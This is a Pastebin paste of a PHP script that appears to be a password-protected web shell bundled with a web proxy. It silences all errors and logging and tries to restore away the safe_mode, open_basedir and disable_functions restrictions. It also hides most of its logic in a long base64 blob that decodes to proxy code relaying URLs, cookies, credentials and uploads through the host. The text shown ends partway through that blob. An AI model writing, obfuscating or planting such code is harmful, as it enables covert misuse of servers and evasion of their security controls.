EddieKidiw

28 Oktober 2017

Oct 28th, 2017
3,220,319
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 484.16 KB | None | 0 0
  1. <?php
  2. error_reporting(0);
  3. set_time_limit(0);
  4. if(function_exists('ini_set')){
  5. ini_set('output_buffering',0);
  6. ini_set('display_errors',0);
  7. ini_set('log_errors',0);
  8. ini_set('error_log',null);
  9. ini_set('max_execution_time',0);
  10. ini_set('zlib.output_compression','Off');
  11. ini_set('session.save_handler','files');
  12. if(function_exists('session_save_path')){
  13. ini_set('session.save_path','/tmp');
  14. session_save_path('/tmp');
  15. }
  16. }
  17. session_start();
  18. if(function_exists('ini_restore')){
  19. ini_restore('safe_mode');
  20. ini_restore('open_basedir');
  21. ini_restore('allow_url_fopen');
  22. ini_restore('disable_functions');
  23. ini_restore('safe_mode_exec_dir');
  24. ini_restore('safe_mode_include_dir');
  25. }
  26. ignore_user_abort(false);
  27. date_default_timezone_set('Etc/GMT');
  28. define('SELF_PATH',__FILE__);
  29. define('PHPSELF',$_SERVER['PHP_SELF']);
  30. define('lokasi','http'.(isset($_SERVER['HTTPS'])?'s':'').'://'.$_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME']);
  31. $pass='5058f1af8388633f609cadb75a75dc9d';
  32.  
  33. if(get_magic_quotes_gpc()){
  34. function stripslashes_array($a){
  35. return is_array($a)?array_map('stripslashes_array',$a):stripslashes($a);
  36. }
  37. $_POST=stripslashes_array($_POST);
  38. }
  39. //
  40. // CONFIGURABLE OPTIONS
  41. //
  42. $_config=array('url_var_name'=>'q','flags_var_name'=>'hl','get_form_name'=>'____pgfa','basic_auth_var_name'=>'____pbavn','max_file_size'=>-1,'allow_hotlinking'=>0,'upon_hotlink'=>1,'compress_output'=>0);
  43. $_flags=array('include_form'=>0,'remove_scripts'=>0,'accept_cookies'=>1,'show_images'=>1,'show_referer'=>1,'rotate13'=>0,'base64_encode'=>0,'strip_meta'=>0,'strip_title'=>0,'session_cookies'=>1);
  44. $_frozen_flags=array('include_form'=>0,'remove_scripts'=>0,'accept_cookies'=>1,'show_images'=>1,'show_referer'=>1,'rotate13'=>0,'base64_encode'=>0,'strip_meta'=>0,'strip_title'=>0,'session_cookies'=>1);
  45. $_labels=array('include_form'=>array('Include Form','Include mini URL-form on every page'),'remove_scripts'=>array('Remove Scripts','Remove client-side scripting (i.e JavaScript)'),'accept_cookies'=>array('Accept Cookies','Allow cookies to be stored'),'show_images'=>array('Show Images','Show images on browsed pages'),'show_referer'=>array('Show Referer','Show actual referring Website'),'rotate13'=>array('Rotate13','Use ROT13 encoding on the address'),'base64_encode'=>array('Base64','Use base64 encodng on the address'),'strip_meta'=>array('Strip Meta','Strip meta information tags from pages'),'strip_title'=>array('Strip Title','Strip page title'),'session_cookies'=>array('Session Cookies','Store cookies for this session only'));
  46. $_hosts=array('#^127\.|192\.168\.|10\.|172\.(1[6-9]|2[0-9]|3[01])\.|localhost#i');
  47. $_hotlink_domains=array();
  48. $_insert=array();
  49. //
  50. // END CONFIGURABLE OPTIONS. The ride for you ends here. Close the file.
  51. //
  52. $_iflags='';
  53. $_system=array('ssl'=>extension_loaded('openssl')&&version_compare(PHP_VERSION,'4.3.0','>='),'uploads'=>ini_get('file_uploads'),'gzip'=>extension_loaded('zlib')&&!ini_get('zlib.output_compression'),'stripslashes'=>get_magic_quotes_gpc());
  54. $_proxify=array('text/html'=>1,'application/xml+xhtml'=>1,'application/xhtml+xml'=>1,'text/css'=>1);
  55. $_version='0.5b2';
  56. $_http_host=isset($_SERVER['HTTP_HOST'])?$_SERVER['HTTP_HOST']:(isset($_SERVER['SERVER_NAME'])?$_SERVER['SERVER_NAME']:'localhost');
  57. $_script_url='http'.((isset($_ENV['HTTPS'])&&$_ENV['HTTPS']=='on')||$_SERVER['SERVER_PORT']==443?'s':'').'://'.$_http_host.($_SERVER['SERVER_PORT']!=80&&$_SERVER['SERVER_PORT']!=443?':'.$_SERVER['SERVER_PORT']:'').PHPSELF;
  58. $_script_base=substr($_script_url,0,strrpos($_script_url,'/')+1);
  59. $_url='';$_url_parts=array();$_base=array();$_socket=null;$_request_method=$_SERVER['REQUEST_METHOD'];$_request_headers='';$_cookie='';$_post_body='';$_response_headers=array();$_response_keys=array();$_http_version='';$_response_code=0;$_content_type='text/html';$_content_length=false;$_content_disp='';$_set_cookie=array();$_retry=false;$_quit=false;$_basic_auth_header='';$_basic_auth_realm='';$_auth_creds=array();$_response_body='';
  60. $menu=base64_decode('aWYoaXNzZXQoJF9QT1NUWyRfY29uZmlnWyd1cmxfdmFyX25hbWUnXV0pICYmICFpc3NldCgkX0dF
  61. VFskX2NvbmZpZ1sndXJsX3Zhcl9uYW1lJ11dKSAmJiBpc3NldCgkX1BPU1RbJF9jb25maWdbJ2Zs
  62. YWdzX3Zhcl9uYW1lJ11dKSl7Zm9yZWFjaCgkX2ZsYWdzIGFzICRmbGFnX25hbWUgPT4gJGZsYWdf
  63. dmFsdWUpeyRfaWZsYWdzIC49IGlzc2V0KCRfUE9TVFskX2NvbmZpZ1snZmxhZ3NfdmFyX25hbWUn
  64. XV1bJGZsYWdfbmFtZV0pPyhzdHJpbmcpKGludCkoYm9vbCkkX1BPU1RbJF9jb25maWdbJ2ZsYWdz
  65. X3Zhcl9uYW1lJ11dWyRmbGFnX25hbWVdOigkX2Zyb3plbl9mbGFnc1skZmxhZ19uYW1lXT8kZmxh
  66. Z192YWx1ZTonMCcpO30kX2lmbGFncz1iYXNlX2NvbnZlcnQoKCRfaWZsYWdzICE9ICcnPyRfaWZs
  67. YWdzOicwJyksMiwxNik7fWVsc2VpZihpc3NldCgkX0dFVFskX2NvbmZpZ1snZmxhZ3NfdmFyX25h
  68. bWUnXV0pICYmICFpc3NldCgkX0dFVFskX2NvbmZpZ1snZ2V0X2Zvcm1fbmFtZSddXSkgJiYgY3R5
  69. cGVfYWxudW0oJF9HRVRbJF9jb25maWdbJ2ZsYWdzX3Zhcl9uYW1lJ11dKSl7JF9pZmxhZ3M9JF9H
  70. RVRbJF9jb25maWdbJ2ZsYWdzX3Zhcl9uYW1lJ11dO31lbHNlaWYoaXNzZXQoJF9DT09LSUVbJ2Zs
  71. YWdzJ10pICYmIGN0eXBlX2FsbnVtKCRfQ09PS0lFWydmbGFncyddKSl7JF9pZmxhZ3M9JF9DT09L
  72. SUVbJ2ZsYWdzJ107fWlmKCRfaWZsYWdzICE9PSAnJyl7JF9zZXRfY29va2llW109YWRkX2Nvb2tp
  73. ZSgnZmxhZ3MnLCRfaWZsYWdzLHRpbWUoKSsyNDE5MjAwKTskX2lmbGFncz1zdHJfcGFkKGJhc2Vf
  74. Y29udmVydCgkX2lmbGFncywxNiwyKSxjb3VudCgkX2ZsYWdzKSwnMCcsU1RSX1BBRF9MRUZUKTsk
  75. aT0wO2ZvcmVhY2goJF9mbGFncyBhcyAkZmxhZ19uYW1lID0+ICRmbGFnX3ZhbHVlKXskX2ZsYWdz
  76. WyRmbGFnX25hbWVdPSRfZnJvemVuX2ZsYWdzWyRmbGFnX25hbWVdPyRmbGFnX3ZhbHVlOihpbnQp
  77. KGJvb2wpJF9pZmxhZ3N7JGl9OyRpKys7fX1pZigkX2ZsYWdzWydyb3RhdGUxMyddKXtmdW5jdGlv
  78. biBlbmNvZGVfdXJsKCR1cmwpe3JldHVybiByYXd1cmxlbmNvZGUoc3RyX3JvdDEzKCR1cmwpKTt9
  79. ZnVuY3Rpb24gZGVjb2RlX3VybCgkdXJsKXtyZXR1cm4gc3RyX3JlcGxhY2UoYXJyYXkoJyZhbXA7
  80. JywnJiMzODsnKSwnJicsc3RyX3JvdDEzKHJhd3VybGRlY29kZSgkdXJsKSkpO319ZWxzZWlmKCRf
  81. ZmxhZ3NbJ2Jhc2U2NF9lbmNvZGUnXSl7ZnVuY3Rpb24gZW5jb2RlX3VybCgkdXJsKXtyZXR1cm4g
  82. cmF3dXJsZW5jb2RlKGJhc2U2NF9lbmNvZGUoJHVybCkpO31mdW5jdGlvbiBkZWNvZGVfdXJsKCR1
  83. cmwpe3JldHVybiBzdHJfcmVwbGFjZShhcnJheSgnJmFtcDsnLCcmIzM4OycpLCcmJyxiYXNlNjRf
  84. ZGVjb2RlKHJhd3VybGRlY29kZSgkdXJsKSkpO319ZWxzZXtmdW5jdGlvbiBlbmNvZGVfdXJsKCR1
  85. cmwpe3JldHVybiByYXd1cmxlbmNvZGUoJHVybCk7fWZ1bmN0aW9uIGRlY29kZV91cmwoJHVybCl7
  86. cmV0dXJuIHN0cl9yZXBsYWNlKGFycmF5KCcmYW1wOycsJyYjMzg7JyksJyYnLHJhd3VybGRlY29k
  87. ZSgkdXJsKSk7fX1pZigkX2NvbmZpZ1snY29tcHJlc3Nfb3V0cHV0J10gJiYgJF9zeXN0ZW1bJ2d6
  88. aXAnXSl7b2Jfc3RhcnQoJ29iX2d6aGFuZGxlcicpO31pZigkX3N5c3RlbVsnc3RyaXBzbGFzaGVz
  89. J10pe2Z1bmN0aW9uIF9zdHJpcHNsYXNoZXMoJHZhbHVlKXtyZXR1cm4gaXNfYXJyYXkoJHZhbHVl
  90. KT9hcnJheV9tYXAoJ19zdHJpcHNsYXNoZXMnLCR2YWx1ZSk6KGlzX3N0cmluZygkdmFsdWUpP3N0
  91. cmlwc2xhc2hlcygkdmFsdWUpOiR2YWx1ZSk7fSRfR0VUPV9zdHJpcHNsYXNoZXMoJF9HRVQpOyRf
  92. UE9TVD1fc3RyaXBzbGFzaGVzKCRfUE9TVCk7JF9DT09LSUU9X3N0cmlwc2xhc2hlcygkX0NPT0tJ
  93. RSk7fWlmKGlzc2V0KCRfUE9TVFskX2NvbmZpZ1sndXJsX3Zhcl9uYW1lJ11dKSAmJiAhaXNzZXQo
  94. JF9HRVRbJF9jb25maWdbJ3VybF92YXJfbmFtZSddXSkpe2hlYWRlcignTG9jYXRpb246ICcuJF9z
  95. Y3JpcHRfdXJsLic/Jy4kX2NvbmZpZ1sndXJsX3Zhcl9uYW1lJ10uJz0nLmVuY29kZV91cmwoJF9Q
  96. T1NUWyRfY29uZmlnWyd1cmxfdmFyX25hbWUnXV0pLicmJy4kX2NvbmZpZ1snZmxhZ3NfdmFyX25h
  97. bWUnXS4nPScuYmFzZV9jb252ZXJ0KCRfaWZsYWdzLDIsMTYpKTtleGl0KDApO31pZihpc3NldCgk
  98. X0dFVFskX2NvbmZpZ1snZ2V0X2Zvcm1fbmFtZSddXSkpeyRfdXJsPWRlY29kZV91cmwoJF9HRVRb
  99. JF9jb25maWdbJ2dldF9mb3JtX25hbWUnXV0pOyRxc3RyPXN0cnBvcygkX3VybCwnPycpICE9PSBm
  100. YWxzZT8oc3RycG9zKCRfdXJsLCc/JykgPT09IHN0cmxlbigkX3VybCktMT8nJzonJicpOic/Jzsk
  101. YXJyPWV4cGxvZGUoJyYnLCRfU0VSVkVSWydRVUVSWV9TVFJJTkcnXSk7aWYocHJlZ19tYXRjaCgn
  102. I15cUScuJF9jb25maWdbJ2dldF9mb3JtX25hbWUnXS4nXEUjJywkYXJyWzBdKSl7YXJyYXlfc2hp
  103. ZnQoJGFycik7fSRfdXJsIC49ICRxc3RyLmltcGxvZGUoJyYnLCRhcnIpO31lbHNlaWYoaXNzZXQo
  104. JF9HRVRbJF9jb25maWdbJ3VybF92YXJfbmFtZSddXSkpeyRfdXJsPWRlY29kZV91cmwoJF9HRVRb
  105. JF9jb25maWdbJ3VybF92YXJfbmFtZSddXSk7fWVsc2VpZihpc3NldCgkX0dFVFsnYWN0aW9uJ10p
  106. ICYmICRfR0VUWydhY3Rpb24nXSA9PSAnY29va2llcycpe3Nob3dfcmVwb3J0KGFycmF5KCd3aGlj
  107. aCcgPT4gJ2Nvb2tpZXMnKSk7fWVsc2V7c2hvd19yZXBvcnQoYXJyYXkoJ3doaWNoJyA9PiAnaW5k
  108. ZXgnLCdjYXRlZ29yeScgPT4gJ2VudHJ5X2Zvcm0nKSk7fWlmKGlzc2V0KCRfR0VUWyRfY29uZmln
  109. Wyd1cmxfdmFyX25hbWUnXV0sJF9QT1NUWyRfY29uZmlnWydiYXNpY19hdXRoX3Zhcl9uYW1lJ11d
  110. LCRfUE9TVFsndXNlcm5hbWUnXSwkX1BPU1RbJ3Bhc3N3b3JkJ10pKXskX3JlcXVlc3RfbWV0aG9k
  111. PSdHRVQnOyRfYmFzaWNfYXV0aF9yZWFsbT1iYXNlNjRfZGVjb2RlKCRfUE9TVFskX2NvbmZpZ1sn
  112. YmFzaWNfYXV0aF92YXJfbmFtZSddXSk7JF9iYXNpY19hdXRoX2hlYWRlcj1iYXNlNjRfZW5jb2Rl
  113. KCRfUE9TVFsndXNlcm5hbWUnXS4nOicuJF9QT1NUWydwYXNzd29yZCddKTt9aWYoc3RycG9zKCRf
  114. dXJsLCc6Ly8nKSA9PT0gZmFsc2UpeyRfdXJsPSdodHRwOi8vJy4kX3VybDt9aWYodXJsX3BhcnNl
  115. KCRfdXJsLCRfdXJsX3BhcnRzKSl7JF9iYXNlPSRfdXJsX3BhcnRzO2lmKCFlbXB0eSgkX2hvc3Rz
  116. KSl7Zm9yZWFjaCgkX2hvc3RzIGFzICRob3N0KXtpZihwcmVnX21hdGNoKCRob3N0LCRfdXJsX3Bh
  117. cnRzWydob3N0J10pKXtzaG93X3JlcG9ydChhcnJheSgnd2hpY2gnID0+ICdpbmRleCcsJ2NhdGVn
  118. b3J5JyA9PiAnZXJyb3InLCdncm91cCcgPT4gJ3VybCcsJ3R5cGUnID0+ICdleHRlcm5hbCcsJ2Vy
  119. cm9yJyA9PiAxKSk7fX19fWVsc2V7c2hvd19yZXBvcnQoYXJyYXkoJ3doaWNoJyA9PiAnaW5kZXgn
  120. LCdjYXRlZ29yeScgPT4gJ2Vycm9yJywnZ3JvdXAnID0+ICd1cmwnLCd0eXBlJyA9PiAnZXh0ZXJu
  121. YWwnLCdlcnJvcicgPT4gMikpO31pZighJF9jb25maWdbJ2FsbG93X2hvdGxpbmtpbmcnXSAmJiBp
  122. c3NldCgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pKXskX2hvdGxpbmtfZG9tYWluc1tdPSRfaHR0
  123. cF9ob3N0OyRpc19ob3RsaW5raW5nPXRydWU7Zm9yZWFjaCgkX2hvdGxpbmtfZG9tYWlucyBhcyAk
  124. aG9zdCl7aWYocHJlZ19tYXRjaCgnI15odHRwcz9cOlwvXC8od3d3KT9cUScuJGhvc3QuJ1xFKFwv
  125. fFw6fCQpI2knLHRyaW0oJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddKSkpeyRpc19ob3RsaW5raW5n
  126. PWZhbHNlO2JyZWFrO319aWYoJGlzX2hvdGxpbmtpbmcpe3N3aXRjaCgkX2NvbmZpZ1sndXBvbl9o
  127. b3RsaW5rJ10pe2Nhc2UgMTpzaG93X3JlcG9ydChhcnJheSgnd2hpY2gnID0+ICdpbmRleCcsJ2Nh
  128. dGVnb3J5JyA9PiAnZXJyb3InLCdncm91cCcgPT4gJ3Jlc291cmNlJywndHlwZScgPT4gJ2hvdGxp
  129. bmtpbmcnKSk7YnJlYWs7Y2FzZSAyOmhlYWRlcignSFRUUC8xLjAgNDA0IE5vdCBGb3VuZCcpO2V4
  130. aXQoMCk7ZGVmYXVsdDpoZWFkZXIoJ0xvY2F0aW9uOiAnLiRfY29uZmlnWyd1cG9uX2hvdGxpbmsn
  131. XSk7ZXhpdCgwKTt9fX1kb3skX3JldHJ5PWZhbHNlOyRfc29ja2V0PUBmc29ja29wZW4oKCRfdXJs
  132. X3BhcnRzWydzY2hlbWUnXSA9PT0gJ2h0dHBzJyAmJiAkX3N5c3RlbVsnc3NsJ10/J3NzbDovLyc6
  133. J3RjcDovLycpLiRfdXJsX3BhcnRzWydob3N0J10sJF91cmxfcGFydHNbJ3BvcnQnXSwkZXJyX25v
  134. LCRlcnJfc3RyLDMwKTtpZigkX3NvY2tldCA9PT0gZmFsc2Upe3Nob3dfcmVwb3J0KGFycmF5KCd3
  135. aGljaCcgPT4gJ2luZGV4JywnY2F0ZWdvcnknID0+ICdlcnJvcicsJ2dyb3VwJyA9PiAndXJsJywn
  136. dHlwZScgPT4gJ2ludGVybmFsJywnZXJyb3InID0+ICRlcnJfbm8pKTt9JF9yZXF1ZXN0X2hlYWRl
  137. cnM9JF9yZXF1ZXN0X21ldGhvZC4nICcuJF91cmxfcGFydHNbJ3BhdGgnXTtpZihpc3NldCgkX3Vy
  138. bF9wYXJ0c1sncXVlcnknXSkpeyRfcmVxdWVzdF9oZWFkZXJzIC49ICc/JzskcXVlcnk9cHJlZ19z
  139. cGxpdCgnIyhbJjtdKSMnLCRfdXJsX3BhcnRzWydxdWVyeSddLC0xLFBSRUdfU1BMSVRfREVMSU1f
  140. Q0FQVFVSRSk7Zm9yKCRpPTAsJGNvdW50PWNvdW50KCRxdWVyeSk7JGk8JGNvdW50OyRfcmVxdWVz
  141. dF9oZWFkZXJzIC49IGltcGxvZGUoJz0nLGFycmF5X21hcCgndXJsZW5jb2RlJyxhcnJheV9tYXAo
  142. J3VybGRlY29kZScsZXhwbG9kZSgnPScsJHF1ZXJ5WyRpXSkpKSkuKGlzc2V0KCRxdWVyeVsrKyRp
  143. XSk/JHF1ZXJ5WyRpXTonJyksJGkrKyk7fSRfcmVxdWVzdF9oZWFkZXJzIC49ICIgSFRUUC8xLjBc
  144. clxuIjskX3JlcXVlc3RfaGVhZGVycyAuPSAnSG9zdDogJy4kX3VybF9wYXJ0c1snaG9zdCddLiRf
  145. dXJsX3BhcnRzWydwb3J0X2V4dCddLiJcclxuIjtpZihpc3NldCgkX1NFUlZFUlsnSFRUUF9VU0VS
  146. X0FHRU5UJ10pKXskX3JlcXVlc3RfaGVhZGVycyAuPSAnVXNlci1BZ2VudDogJy4kX1NFUlZFUlsn
  147. SFRUUF9VU0VSX0FHRU5UJ10uIlxyXG4iO31pZihpc3NldCgkX1NFUlZFUlsnSFRUUF9BQ0NFUFQn
  148. XSkpeyRfcmVxdWVzdF9oZWFkZXJzIC49ICdBY2NlcHQ6ICcuJF9TRVJWRVJbJ0hUVFBfQUNDRVBU
  149. J10uIlxyXG4iO31lbHNleyRfcmVxdWVzdF9oZWFkZXJzIC49ICJBY2NlcHQ6ICovKjtxPTAuMVxy
  150. XG4iO31pZigkX2ZsYWdzWydzaG93X3JlZmVyZXInXSAmJiBpc3NldCgkX1NFUlZFUlsnSFRUUF9S
  151. RUZFUkVSJ10pICYmIHByZWdfbWF0Y2goJyNeXFEnLiRfc2NyaXB0X3VybC4nPycuJF9jb25maWdb
  152. J3VybF92YXJfbmFtZSddLic9XEUoW14mXSspIycsJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddLCRt
  153. YXRjaGVzKSl7JF9yZXF1ZXN0X2hlYWRlcnMgLj0gJ1JlZmVyZXI6ICcuZGVjb2RlX3VybCgkbWF0
  154. Y2hlc1sxXSkuIlxyXG4iO31pZighZW1wdHkoJF9DT09LSUUpKXskX2Nvb2tpZT0nJzskX2F1dGhf
  155. Y3JlZHM9YXJyYXkoKTtmb3JlYWNoKCRfQ09PS0lFIGFzICRjb29raWVfaWQgPT4gJGNvb2tpZV9j
  156. b250ZW50KXskY29va2llX2lkPWV4cGxvZGUoJzsnLHJhd3VybGRlY29kZSgkY29va2llX2lkKSk7
  157. JGNvb2tpZV9jb250ZW50PWV4cGxvZGUoJzsnLHJhd3VybGRlY29kZSgkY29va2llX2NvbnRlbnQp
  158. KTtpZigkY29va2llX2lkWzBdID09PSAnQ09PS0lFJyl7JGNvb2tpZV9pZFszXT1zdHJfcmVwbGFj
  159. ZSgnXycsJy4nLCRjb29raWVfaWRbM10pO2lmKGNvdW50KCRjb29raWVfaWQpPDQgfHwgKCRjb29r
  160. aWVfY29udGVudFsxXSA9PSAnc2VjdXJlJyAmJiAkX3VybF9wYXJ0c1snc2NoZW1lJ10gIT0gJ2h0
  161. dHBzJykpe2NvbnRpbnVlO31pZigocHJlZ19tYXRjaCgnI1xRJy4kY29va2llX2lkWzNdLidcRSQj
  162. aScsJF91cmxfcGFydHNbJ2hvc3QnXSkgfHwgc3RydG9sb3dlcigkY29va2llX2lkWzNdKSA9PSBz
  163. dHJ0b2xvd2VyKCcuJy4kX3VybF9wYXJ0c1snaG9zdCddKSkgJiYgcHJlZ19tYXRjaCgnI15cUScu
  164. JGNvb2tpZV9pZFsyXS4nXEUjJywkX3VybF9wYXJ0c1sncGF0aCddKSl7JF9jb29raWUgLj0gKCRf
  165. Y29va2llICE9ICcnPyc7ICc6JycpLihlbXB0eSgkY29va2llX2lkWzFdKT8nJzokY29va2llX2lk
  166. WzFdLic9JykuJGNvb2tpZV9jb250ZW50WzBdO319ZWxzZWlmKCRjb29raWVfaWRbMF0gPT09ICdB
  167. VVRIJyAmJiBjb3VudCgkY29va2llX2lkKSA9PT0gMyl7JGNvb2tpZV9pZFsyXT1zdHJfcmVwbGFj
  168. ZSgnXycsJy4nLCRjb29raWVfaWRbMl0pO2lmKCRfdXJsX3BhcnRzWydob3N0J10uJzonLiRfdXJs
  169. X3BhcnRzWydwb3J0J10gPT09ICRjb29raWVfaWRbMl0peyRfYXV0aF9jcmVkc1skY29va2llX2lk
  170. WzFdXT0kY29va2llX2NvbnRlbnRbMF07fX19aWYoJF9jb29raWUgIT0gJycpeyRfcmVxdWVzdF9o
  171. ZWFkZXJzIC49ICJDb29raWU6ICRfY29va2llXHJcbiI7fX1pZihpc3NldCgkX3VybF9wYXJ0c1sn
  172. dXNlciddLCRfdXJsX3BhcnRzWydwYXNzJ10pKXskX2Jhc2ljX2F1dGhfaGVhZGVyPWJhc2U2NF9l
  173. bmNvZGUoJF91cmxfcGFydHNbJ3VzZXInXS4nOicuJF91cmxfcGFydHNbJ3Bhc3MnXSk7fWlmKCFl
  174. bXB0eSgkX2Jhc2ljX2F1dGhfaGVhZGVyKSl7JF9zZXRfY29va2llW109YWRkX2Nvb2tpZSgiQVVU
  175. SDt7JF9iYXNpY19hdXRoX3JlYWxtfTt7JF91cmxfcGFydHNbJ2hvc3QnXX06eyRfdXJsX3BhcnRz
  176. Wydwb3J0J119IiwkX2Jhc2ljX2F1dGhfaGVhZGVyKTskX3JlcXVlc3RfaGVhZGVycyAuPSAiQXV0
  177. aG9yaXphdGlvbjogQmFzaWMgeyRfYmFzaWNfYXV0aF9oZWFkZXJ9XHJcbiI7fWVsc2VpZighZW1w
  178. dHkoJF9iYXNpY19hdXRoX3JlYWxtKSAmJiBpc3NldCgkX2F1dGhfY3JlZHNbJF9iYXNpY19hdXRo
  179. X3JlYWxtXSkpeyRfcmVxdWVzdF9oZWFkZXJzIC49ICJBdXRob3JpemF0aW9uOiBCYXNpYyB7JF9h
  180. dXRoX2NyZWRzWyRfYmFzaWNfYXV0aF9yZWFsbV19XHJcbiI7fWVsc2VpZihsaXN0KCRfYmFzaWNf
  181. YXV0aF9yZWFsbSwkX2Jhc2ljX2F1dGhfaGVhZGVyKT1lYWNoKCRfYXV0aF9jcmVkcykpeyRfcmVx
  182. dWVzdF9oZWFkZXJzIC49ICJBdXRob3JpemF0aW9uOiBCYXNpYyB7JF9iYXNpY19hdXRoX2hlYWRl
  183. cn1cclxuIjt9aWYoJF9yZXF1ZXN0X21ldGhvZCA9PSAnUE9TVCcpe2lmKCFlbXB0eSgkX0ZJTEVT
  184. KSAmJiAkX3N5c3RlbVsndXBsb2FkcyddKXskX2RhdGFfYm91bmRhcnk9Jy0tLS0nLm1kNSh1bmlx
  185. aWQocmFuZCgpLHRydWUpKTskYXJyYXk9c2V0X3Bvc3RfdmFycygkX1BPU1QpO2ZvcmVhY2goJGFy
  186. cmF5IGFzICRrZXkgPT4gJHZhbHVlKXskX3Bvc3RfYm9keSAuPSAiLS17JF9kYXRhX2JvdW5kYXJ5
  187. fVxyXG4iOyRfcG9zdF9ib2R5IC49ICJDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5h
  188. bWU9XCIka2V5XCJcclxuXHJcbiI7JF9wb3N0X2JvZHkgLj0gdXJsZGVjb2RlKCR2YWx1ZSkuIlxy
  189. XG4iO30kYXJyYXk9c2V0X3Bvc3RfZmlsZXMoJF9GSUxFUyk7Zm9yZWFjaCgkYXJyYXkgYXMgJGtl
  190. eSA9PiAkZmlsZV9pbmZvKXskX3Bvc3RfYm9keSAuPSAiLS17JF9kYXRhX2JvdW5kYXJ5fVxyXG4i
  191. OyRfcG9zdF9ib2R5IC49ICJDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9XCIk
  192. a2V5XCI7IGZpbGVuYW1lPVwieyRmaWxlX2luZm9bJ25hbWUnXX1cIlxyXG4iOyRfcG9zdF9ib2R5
  193. IC49ICdDb250ZW50LVR5cGU6ICcuKGVtcHR5KCRmaWxlX2luZm9bJ3R5cGUnXSk/J2FwcGxpY2F0
  194. aW9uL29jdGV0LXN0cmVhbSc6JGZpbGVfaW5mb1sndHlwZSddKS4iXHJcblxyXG4iO2lmKGlzX3Jl
  195. YWRhYmxlKCRmaWxlX2luZm9bJ3RtcF9uYW1lJ10pKXskaGFuZGxlPWZvcGVuKCRmaWxlX2luZm9b
  196. J3RtcF9uYW1lJ10sJ3JiJyk7JF9wb3N0X2JvZHkgLj0gZnJlYWQoJGhhbmRsZSxmaWxlc2l6ZSgk
  197. ZmlsZV9pbmZvWyd0bXBfbmFtZSddKSk7ZmNsb3NlKCRoYW5kbGUpO30kX3Bvc3RfYm9keSAuPSAi
  198. XHJcbiI7fSRfcG9zdF9ib2R5IC49ICItLXskX2RhdGFfYm91bmRhcnl9LS1cclxuIjskX3JlcXVl
  199. c3RfaGVhZGVycyAuPSAiQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3VuZGFy
  200. eT17JF9kYXRhX2JvdW5kYXJ5fVxyXG4iOyRfcmVxdWVzdF9oZWFkZXJzIC49ICJDb250ZW50LUxl
  201. bmd0aDogIi5zdHJsZW4oJF9wb3N0X2JvZHkpLiJcclxuXHJcbiI7JF9yZXF1ZXN0X2hlYWRlcnMg
  202. Lj0gJF9wb3N0X2JvZHk7fWVsc2V7JGFycmF5PXNldF9wb3N0X3ZhcnMoJF9QT1NUKTtmb3JlYWNo
  203. KCRhcnJheSBhcyAka2V5ID0+ICR2YWx1ZSl7JF9wb3N0X2JvZHkgLj0gIWVtcHR5KCRfcG9zdF9i
  204. b2R5KT8nJic6Jyc7JF9wb3N0X2JvZHkgLj0gJGtleS4nPScuJHZhbHVlO30kX3JlcXVlc3RfaGVh
  205. ZGVycyAuPSAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWRc
  206. clxuIjskX3JlcXVlc3RfaGVhZGVycyAuPSAiQ29udGVudC1MZW5ndGg6ICIuc3RybGVuKCRfcG9z
  207. dF9ib2R5KS4iXHJcblxyXG4iOyRfcmVxdWVzdF9oZWFkZXJzIC49ICRfcG9zdF9ib2R5OyRfcmVx
  208. dWVzdF9oZWFkZXJzIC49ICJcclxuIjt9JF9wb3N0X2JvZHk9Jyc7fWVsc2V7JF9yZXF1ZXN0X2hl
  209. YWRlcnMgLj0gIlxyXG4iO31md3JpdGUoJF9zb2NrZXQsJF9yZXF1ZXN0X2hlYWRlcnMpOyRfcmVz
  210. cG9uc2VfaGVhZGVycz0kX3Jlc3BvbnNlX2tleXM9YXJyYXkoKTskbGluZT1mZ2V0cygkX3NvY2tl
  211. dCw4MTkyKTt3aGlsZShzdHJzcG4oJGxpbmUsIlxyXG4iKSAhPT0gc3RybGVuKCRsaW5lKSl7QGxp
  212. c3QoJG5hbWUsJHZhbHVlKT1leHBsb2RlKCc6JywkbGluZSwyKTskbmFtZT10cmltKCRuYW1lKTsk
  213. X3Jlc3BvbnNlX2hlYWRlcnNbc3RydG9sb3dlcigkbmFtZSldW109dHJpbSgkdmFsdWUpOyRfcmVz
  214. cG9uc2Vfa2V5c1tzdHJ0b2xvd2VyKCRuYW1lKV09JG5hbWU7JGxpbmU9ZmdldHMoJF9zb2NrZXQs
  215. ODE5Mik7fXNzY2FuZihjdXJyZW50KCRfcmVzcG9uc2Vfa2V5cyksJyVzICVzJywkX2h0dHBfdmVy
  216. c2lvbiwkX3Jlc3BvbnNlX2NvZGUpO2lmKGlzc2V0KCRfcmVzcG9uc2VfaGVhZGVyc1snY29udGVu
  217. dC10eXBlJ10pKXtsaXN0KCRfY29udGVudF90eXBlLCk9ZXhwbG9kZSgnOycsc3RyX3JlcGxhY2Uo
  218. JyAnLCcnLHN0cnRvbG93ZXIoJF9yZXNwb25zZV9oZWFkZXJzWydjb250ZW50LXR5cGUnXVswXSkp
  219. LDIpO31pZihpc3NldCgkX3Jlc3BvbnNlX2hlYWRlcnNbJ2NvbnRlbnQtbGVuZ3RoJ10pKXskX2Nv
  220. bnRlbnRfbGVuZ3RoPSRfcmVzcG9uc2VfaGVhZGVyc1snY29udGVudC1sZW5ndGgnXVswXTt1bnNl
  221. dCgkX3Jlc3BvbnNlX2hlYWRlcnNbJ2NvbnRlbnQtbGVuZ3RoJ10sJF9yZXNwb25zZV9rZXlzWydj
  222. b250ZW50LWxlbmd0aCddKTt9aWYoaXNzZXQoJF9yZXNwb25zZV9oZWFkZXJzWydjb250ZW50LWRp
  223. c3Bvc2l0aW9uJ10pKXskX2NvbnRlbnRfZGlzcD0kX3Jlc3BvbnNlX2hlYWRlcnNbJ2NvbnRlbnQt
  224. ZGlzcG9zaXRpb24nXVswXTt1bnNldCgkX3Jlc3BvbnNlX2hlYWRlcnNbJ2NvbnRlbnQtZGlzcG9z
